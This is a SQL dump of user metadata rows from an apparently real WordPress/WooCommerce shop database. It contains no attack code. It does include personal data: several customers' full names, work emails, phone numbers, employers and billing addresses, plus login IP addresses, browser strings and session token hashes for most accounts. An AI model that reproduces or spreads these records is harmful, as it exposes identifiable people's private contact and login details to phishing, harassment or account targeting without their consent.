INSERT INTO `wp_usermeta` VALUES (8225, 494, 'session_tokens', 'a:1:{s:64:"13ef7519e6f32f094779d0a9760c5f5c318525f2880349891a34012e5db1e7f0";a:4:{s:10:"expiration";i:1489184718;s:2:"ip";s:13:"144.46.104.12";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487975118;}}'); 
INSERT INTO `wp_usermeta` VALUES (8226, 495, 'nickname', 'beckert'); 
INSERT INTO `wp_usermeta` VALUES (8227, 495, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8228, 495, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8229, 495, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8230, 495, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8231, 495, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8232, 495, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8233, 495, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8234, 495, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8235, 495, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8236, 495, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8237, 495, '_yoast_wpseo_profile_updated', '1488044401'); 
INSERT INTO `wp_usermeta` VALUES (8238, 495, 'session_tokens', 'a:1:{s:64:"ffce99afd3ae4be53e1f1f0a404360e21e59bf8bb3a6b58c5260360572a13c49";a:4:{s:10:"expiration";i:1489254002;s:2:"ip";s:11:"4.34.66.131";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488044402;}}'); 
INSERT INTO `wp_usermeta` VALUES (8239, 495, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8240, 479, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8241, 496, 'nickname', 'jeff.fogt'); 
INSERT INTO `wp_usermeta` VALUES (8242, 496, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8243, 496, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8244, 496, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8245, 496, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8246, 496, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8247, 496, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8248, 496, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8249, 496, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8250, 496, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8251, 496, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8252, 496, '_yoast_wpseo_profile_updated', '1488193542'); 
INSERT INTO `wp_usermeta` VALUES (8253, 496, 'session_tokens', 'a:1:{s:64:"2925e1ceb4d12a07e39f1e98fa09db54cf0c1aab4b36aa156454bc259221883d";a:4:{s:10:"expiration";i:1502529229;s:2:"ip";s:13:"144.191.148.4";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1501319629;}}'); 
INSERT INTO `wp_usermeta` VALUES (8254, 496, 'billing_first_name', 'Jeff'); 
INSERT INTO `wp_usermeta` VALUES (8255, 496, 'billing_last_name', 'Fogt'); 
INSERT INTO `wp_usermeta` VALUES (8256, 496, 'billing_company', 'Emerson Climate Tech'); 
INSERT INTO `wp_usermeta` VALUES (8257, 496, 'billing_email', 'jeff.fogt@emerson.com'); 
INSERT INTO `wp_usermeta` VALUES (8258, 496, 'billing_phone', '937-495-3105'); 
INSERT INTO `wp_usermeta` VALUES (8259, 496, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8260, 496, 'billing_address_1', '1675 West Campbell Rd.'); 
INSERT INTO `wp_usermeta` VALUES (8261, 496, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (8262, 496, 'billing_city', 'Sidney'); 
INSERT INTO `wp_usermeta` VALUES (8263, 496, 'billing_state', 'OH'); 
INSERT INTO `wp_usermeta` VALUES (8264, 496, 'billing_postcode', '45365'); 
INSERT INTO `wp_usermeta` VALUES (8265, 496, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8266, 497, 'nickname', 'dawson.mellina'); 
INSERT INTO `wp_usermeta` VALUES (8267, 497, 'first_name', 'Dawson'); 
INSERT INTO `wp_usermeta` VALUES (8268, 497, 'last_name', 'Mellina'); 
INSERT INTO `wp_usermeta` VALUES (8269, 497, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8270, 497, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8271, 497, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8272, 497, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8273, 497, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8274, 497, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8275, 497, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8276, 497, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8277, 497, '_yoast_wpseo_profile_updated', '1488202600'); 
INSERT INTO `wp_usermeta` VALUES (8278, 497, 'session_tokens', 'a:1:{s:64:"761f9bd236f681d4a0449c5798d196fb21483bd75a6ccf35f0538dfb160ed339";a:4:{s:10:"expiration";i:1489412201;s:2:"ip";s:14:"192.249.47.218";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488202601;}}'); 
INSERT INTO `wp_usermeta` VALUES (8279, 497, 'last_update', '1488202640'); 
INSERT INTO `wp_usermeta` VALUES (8280, 498, 'nickname', 'jason.ctr.palmeter'); 
INSERT INTO `wp_usermeta` VALUES (8281, 498, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8282, 498, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8283, 498, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8284, 498, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8285, 498, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8286, 498, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8287, 498, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8288, 498, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8289, 498, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8290, 498, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8291, 498, '_yoast_wpseo_profile_updated', '1488215066'); 
INSERT INTO `wp_usermeta` VALUES (8292, 498, 'session_tokens', 'a:1:{s:64:"7e92e47508b7b5821fda823334ff482d50345105a4662f2d1de9b495a2953454";a:4:{s:10:"expiration";i:1490377839;s:2:"ip";s:12:"162.58.0.144";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36";s:5:"login";i:1490205039;}}'); 
INSERT INTO `wp_usermeta` VALUES (8293, 499, 'nickname', 'christopher.hardy'); 
INSERT INTO `wp_usermeta` VALUES (8294, 499, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8295, 499, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8296, 499, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8297, 499, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8298, 499, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8299, 499, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8300, 499, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8301, 499, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8302, 499, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8303, 499, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8304, 499, '_yoast_wpseo_profile_updated', '1488232578'); 
INSERT INTO `wp_usermeta` VALUES (8305, 499, 'session_tokens', 'a:2:{s:64:"b58c03ce802ba891b64f3d6ce3ba741c2322debd55b520b936f2f0309b9c0037";a:4:{s:10:"expiration";i:1489442179;s:2:"ip";s:15:"206.246.158.183";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488232579;}s:64:"4acae6ef94890a5e6a79c410beccc956c2364124b5ee2a3e4b83128c29d8740a";a:4:{s:10:"expiration";i:1488405402;s:2:"ip";s:15:"206.246.158.183";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488232602;}}'); 
INSERT INTO `wp_usermeta` VALUES (8307, 500, 'nickname', 'cindy.mccord'); 
INSERT INTO `wp_usermeta` VALUES (8308, 500, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8309, 500, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8310, 500, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8311, 500, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8312, 500, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8313, 500, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8314, 500, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8315, 500, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8316, 500, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8317, 500, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8318, 500, '_yoast_wpseo_profile_updated', '1488310313'); 
INSERT INTO `wp_usermeta` VALUES (8319, 500, 'session_tokens', 'a:1:{s:64:"f58ea12bb9e783980395cbf4dbd1c9f4ac111fa7b62aee84cfce5df3322d66c4";a:4:{s:10:"expiration";i:1489519922;s:2:"ip";s:12:"146.6.208.38";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1488310322;}}'); 
INSERT INTO `wp_usermeta` VALUES (8320, 500, 'billing_first_name', 'Cindy'); 
INSERT INTO `wp_usermeta` VALUES (8321, 500, 'billing_last_name', 'McCord'); 
INSERT INTO `wp_usermeta` VALUES (8322, 500, 'billing_company', 'Applied Research Lab/University of Texas'); 
INSERT INTO `wp_usermeta` VALUES (8323, 500, 'billing_email', 'cindy.mccord@arlut.utexas.edu'); 
INSERT INTO `wp_usermeta` VALUES (8324, 500, 'billing_phone', '512-835-3383'); 
INSERT INTO `wp_usermeta` VALUES (8325, 500, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8326, 500, 'billing_address_1', 'P.O. Box 8029'); 
INSERT INTO `wp_usermeta` VALUES (8327, 500, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (8328, 500, 'billing_city', 'Austin'); 
INSERT INTO `wp_usermeta` VALUES (8329, 500, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (8330, 500, 'billing_postcode', '78713-8029'); 
INSERT INTO `wp_usermeta` VALUES (8331, 500, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8332, 501, 'nickname', 'gregory.striano'); 
INSERT INTO `wp_usermeta` VALUES (8333, 501, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8334, 501, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8335, 501, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8336, 501, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8337, 501, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8338, 501, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8339, 501, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8340, 501, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8341, 501, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8342, 501, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8343, 501, '_yoast_wpseo_profile_updated', '1488384309'); 
INSERT INTO `wp_usermeta` VALUES (8344, 501, 'session_tokens', 'a:1:{s:64:"b447af1eee71ed7842c53fc6835f2d073c1e0a699b44a57ef054a877b1be7e22";a:4:{s:10:"expiration";i:1489593910;s:2:"ip";s:12:"199.64.6.155";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488384310;}}'); 
INSERT INTO `wp_usermeta` VALUES (8345, 501, 'billing_first_name', 'Greg'); 
INSERT INTO `wp_usermeta` VALUES (8346, 501, 'billing_last_name', 'Striano'); 
INSERT INTO `wp_usermeta` VALUES (8347, 501, 'billing_company', 'Honewyell'); 
INSERT INTO `wp_usermeta` VALUES (8348, 501, 'billing_email', 'gregory.striano@honeywell.com'); 
INSERT INTO `wp_usermeta` VALUES (8349, 501, 'billing_phone', '2156413170'); 
INSERT INTO `wp_usermeta` VALUES (8350, 501, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (8351, 501, 'billing_address_1', '512 Virginia Drive'); 
INSERT INTO `wp_usermeta` VALUES (8352, 501, 'billing_address_2', 'M/S 440'); 
INSERT INTO `wp_usermeta` VALUES (8353, 501, 'billing_city', 'Ft. Washington'); 
INSERT INTO `wp_usermeta` VALUES (8354, 501, 'billing_state', 'PA'); 
INSERT INTO `wp_usermeta` VALUES (8355, 501, 'billing_postcode', '19034'); 
INSERT INTO `wp_usermeta` VALUES (8356, 501, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8357, 502, 'nickname', 'sock-hui_boo'); 
INSERT INTO `wp_usermeta` VALUES (8358, 502, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8359, 502, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8360, 502, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8361, 502, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8362, 502, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8363, 502, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8364, 502, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8365, 502, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8366, 502, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8367, 502, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8368, 502, '_yoast_wpseo_profile_updated', '1488422389'); 
INSERT INTO `wp_usermeta` VALUES (8369, 502, 'session_tokens', 'a:1:{s:64:"f2739fa0eef1f6d7a0a6a4fd248e769cc86a6a59d3c6f63b4967dd11184dcfb3";a:4:{s:10:"expiration";i:1489631990;s:2:"ip";s:13:"42.99.164.106";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488422390;}}'); 
INSERT INTO `wp_usermeta` VALUES (8370, 503, 'nickname', 'ann.m.foderousky-1'); 
INSERT INTO `wp_usermeta` VALUES (8371, 503, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8372, 503, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8373, 503, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8374, 503, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8375, 503, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8376, 503, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8377, 503, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8378, 503, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8379, 503, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8380, 503, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8381, 503, '_yoast_wpseo_profile_updated', '1488476695'); 
INSERT INTO `wp_usermeta` VALUES (8382, 503, 'session_tokens', 'a:1:{s:64:"470da61a517dfda78a6d95fe083f253db8b4167c46a1dd9e5df40f6b781adf1e";a:4:{s:10:"expiration";i:1489686296;s:2:"ip";s:15:"163.206.131.146";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488476696;}}'); 
INSERT INTO `wp_usermeta` VALUES (8384, 504, 'nickname', 'omar.benally'); 
INSERT INTO `wp_usermeta` VALUES (8385, 504, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8386, 504, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8387, 504, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8388, 504, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8389, 504, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8390, 504, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8391, 504, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8392, 504, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8393, 504, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8394, 504, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8395, 504, '_yoast_wpseo_profile_updated', '1488491261'); 
INSERT INTO `wp_usermeta` VALUES (8396, 504, 'session_tokens', 'a:1:{s:64:"bfacb2655445b80cd5531f6417e13d69649736401e659613c2ff7e7b48a80ac0";a:4:{s:10:"expiration";i:1489700862;s:2:"ip";s:11:"65.19.47.25";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488491262;}}'); 
INSERT INTO `wp_usermeta` VALUES (8397, 504, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (8398, 505, 'nickname', 'emeritobeato'); 
INSERT INTO `wp_usermeta` VALUES (8399, 505, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8400, 505, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8401, 505, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8402, 505, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8403, 505, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8404, 505, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8405, 505, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8406, 505, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8407, 505, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8408, 505, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8409, 505, '_yoast_wpseo_profile_updated', '1488494653'); 
INSERT INTO `wp_usermeta` VALUES (8410, 505, 'session_tokens', 'a:1:{s:64:"b34fc7e758910e5f4d5665c8a17c0ca74192840ddc5c3227dae1553cf7e20894";a:4:{s:10:"expiration";i:1489704254;s:2:"ip";s:12:"138.162.8.58";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488494654;}}'); 
INSERT INTO `wp_usermeta` VALUES (8411, 506, 'nickname', 'philip.saunders'); 
INSERT INTO `wp_usermeta` VALUES (8412, 506, 'first_name', 'Philip'); 
INSERT INTO `wp_usermeta` VALUES (8413, 506, 'last_name', 'Saunders'); 
INSERT INTO `wp_usermeta` VALUES (8414, 506, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8415, 506, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8416, 506, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8417, 506, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8418, 506, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8419, 506, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8420, 506, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8421, 506, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8422, 506, '_yoast_wpseo_profile_updated', '1488554050'); 
INSERT INTO `wp_usermeta` VALUES (8423, 506, 'session_tokens', 'a:1:{s:64:"d85d5ce36befac3771c3be970cb7e50321c053b2325f2a32fe2c6a6fac17f430";a:4:{s:10:"expiration";i:1489763653;s:2:"ip";s:12:"131.78.3.131";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488554053;}}'); 
INSERT INTO `wp_usermeta` VALUES (8424, 506, 'last_update', '1488554084'); 
INSERT INTO `wp_usermeta` VALUES (8425, 507, 'nickname', 'cliff.myers'); 
INSERT INTO `wp_usermeta` VALUES (8426, 507, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8427, 507, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8428, 507, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8429, 507, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8430, 507, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8431, 507, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8432, 507, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8433, 507, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8434, 507, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8435, 507, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8436, 507, '_yoast_wpseo_profile_updated', '1488556442'); 
INSERT INTO `wp_usermeta` VALUES (8437, 507, 'session_tokens', 'a:1:{s:64:"e9fbb8d6a378b570d613b22ea616b8b08bfaf96c0bfa6dea9e4aa059124b4950";a:4:{s:10:"expiration";i:1489766043;s:2:"ip";s:12:"131.78.3.134";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488556443;}}'); 
INSERT INTO `wp_usermeta` VALUES (8438, 508, 'nickname', 'andree-anne.cliche'); 
INSERT INTO `wp_usermeta` VALUES (8439, 508, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8440, 508, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8441, 508, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8442, 508, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8443, 508, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8444, 508, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8445, 508, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8446, 508, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8447, 508, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8448, 508, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8449, 508, '_yoast_wpseo_profile_updated', '1488573204'); 
INSERT INTO `wp_usermeta` VALUES (8450, 508, 'session_tokens', 'a:1:{s:64:"14a92839b26cfff7b1da1cf0f0d32117f18c2fe5bf56c21f8daa90b790a028a0";a:4:{s:10:"expiration";i:1489782806;s:2:"ip";s:14:"208.111.75.196";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488573206;}}'); 
INSERT INTO `wp_usermeta` VALUES (8451, 509, 'nickname', 'llwooldridge'); 
INSERT INTO `wp_usermeta` VALUES (8452, 509, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8453, 509, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8454, 509, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8455, 509, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8456, 509, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8457, 509, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8458, 509, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8459, 509, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8460, 509, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8461, 509, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8462, 509, '_yoast_wpseo_profile_updated', '1488808275'); 
INSERT INTO `wp_usermeta` VALUES (8463, 509, 'session_tokens', 'a:1:{s:64:"9c522b05af2d7ef6d511be88d2bd15efed488588cf63087c2441ad89fefc5726";a:4:{s:10:"expiration";i:1490017884;s:2:"ip";s:13:"12.150.27.130";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1488808284;}}'); 
INSERT INTO `wp_usermeta` VALUES (8464, 510, 'nickname', 'jbatt'); 
INSERT INTO `wp_usermeta` VALUES (8465, 510, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8466, 510, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (8467, 510, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8468, 510, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8469, 510, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (8470, 510, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8471, 510, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (8472, 510, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8473, 510, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (8474, 510, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (8475, 510, '_yoast_wpseo_profile_updated', '1488820100'); 
INSERT INTO `wp_usermeta` VALUES (8476, 510, 'session_tokens', 'a:2:{s:64:"a5eb1d0f92498b9d58beceb94602fda17fc8b3bf6b7a4e37f4d4611722fa778c";a:4:{s:10:"expiration";i:1490029718;s:2:"ip";s:11:"107.0.202.3";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488820118;}s:64:"68d3e2d9fccf390fff072610295330915476685ed3ab6e83359d921e8e4883b7";a:4:{s:10:"expiration";i:1489084095;s:2:"ip";s:11:"107.0.202.3";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488911295;}}'); 
INSERT INTO `wp_usermeta` VALUES (8477, 511, 'nickname', 'crystal.beaugez'); 
INSERT INTO `wp_usermeta` VALUES (8478, 511, 'first_name', 'Crystal'); 
INSERT INTO `wp_usermeta` VALUES (8479, 511, 'last_name', 'Beaugez'); 
INSERT INTO `wp_usermeta` VALUES (8480, 511, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (8481, 511, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (8482, 511, 'comment_shortcuts', 'false'); 
